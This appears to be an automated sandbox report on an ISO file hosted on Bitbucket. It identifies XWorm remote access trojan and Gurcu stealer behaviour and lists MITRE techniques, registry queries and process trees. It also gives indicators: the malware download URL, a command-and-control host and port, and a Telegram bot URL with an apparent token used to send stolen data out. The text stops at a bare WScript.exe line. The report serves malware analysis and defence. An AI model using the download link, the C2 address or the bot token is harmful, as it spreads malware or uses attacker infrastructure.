gurcu | hxxps://bitbucket[.]org/xyzcrypter/lmfu/downloads/New_Document-3765618[.]iso

Analysis

max time kernel
1022s
max time network
1047s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30-08-2024 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://bitbucket.org/xyzcrypter/lmfu/downloads/New_Document-3765618.iso

Score

10^/10

gurcu xworm discovery dropper execution rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

yolomesho.work.gd:7000

Mutex

oUFURe5xwVr67Kd5

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessag

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/636-291-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

83 3600 powershell.exe
85 3600 powershell.exe
87 3600 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3600 powershell.exe
4644 powershell.exe
4692 powershell.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

5728 bitsadmin.exe

flow	pid	process
83	3600	powershell.exe
85	3600	powershell.exe
87	3600	powershell.exe

pid	process
3600	powershell.exe
4644	powershell.exe
4692	powershell.exe

pid	process
5728	bitsadmin.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

msedge.exeWScript.exe

description ioc process

File opened (read-only) \??\E: msedge.exe
File opened (read-only) \??\E: WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

3 bitbucket.org
6 bitbucket.org
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

84 api.ipify.org
85 api.ipify.org

description	ioc	process
File opened (read-only)	\??\E:	msedge.exe
File opened (read-only)	\??\E:	WScript.exe

flow	ioc
3	bitbucket.org
6	bitbucket.org

flow	ioc
84	api.ipify.org
85	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 4644 set thread context of 636	4644	powershell.exe	RegSvcs.exe
PID 4692 set thread context of 5352	4692	powershell.exe	RegSvcs.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RegSvcs.exeRegSvcs.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003	msedge.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID	msedge.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service	msedge.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133695021353786451"	chrome.exe

Modifies registry class 2 IoCs

Processes:

msedge.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 238774.crdownload:SmartScreen msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 238774.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exechrome.exemsedge.exemsedge.exeidentity_helper.exepowershell.exe

pid	process
4492	msedge.exe
4492	msedge.exe
2628	msedge.exe
2628	msedge.exe
1532	identity_helper.exe
1532	identity_helper.exe
3312	msedge.exe
3312	msedge.exe
3600	powershell.exe
3600	powershell.exe
3600	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
1892	chrome.exe
1892	chrome.exe
5984	msedge.exe
5984	msedge.exe
6136	msedge.exe
6136	msedge.exe
5020	identity_helper.exe
5020	identity_helper.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

Processes:

msedge.exechrome.exemsedge.exe

pid	process
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe
6136	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msedge.exepowershell.exe

description	pid	process
Token: SeManageVolumePrivilege	2628	msedge.exe
Token: SeManageVolumePrivilege	2628	msedge.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe
Token: 35	3600	powershell.exe
Token: 36	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe
Token: 35	3600	powershell.exe
Token: 36	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exechrome.exe

pid	process
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exechrome.exefirefox.exe

pid	process
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
2628	msedge.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

5428 firefox.exe
5428 firefox.exe
5428 firefox.exe
5428 firefox.exe

pid	process
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe
5428	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2628 wrote to memory of 1780	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 1780	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 716	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 4492	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 4492	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe
PID 2628 wrote to memory of 3220	2628	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bitbucket.org/xyzcrypter/lmfu/downloads/New_Document-3765618.iso
1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff83d7446f8,0x7ff83d744708,0x7ff83d744718
  2⤵
  PID:1780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8
  2⤵
  PID:4184
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3964 /prefetch:8
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:1980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
  2⤵
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16898534474632421032,13292506300696833176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:1552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3048

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2100

C:\Windows\System32\WScript.exe
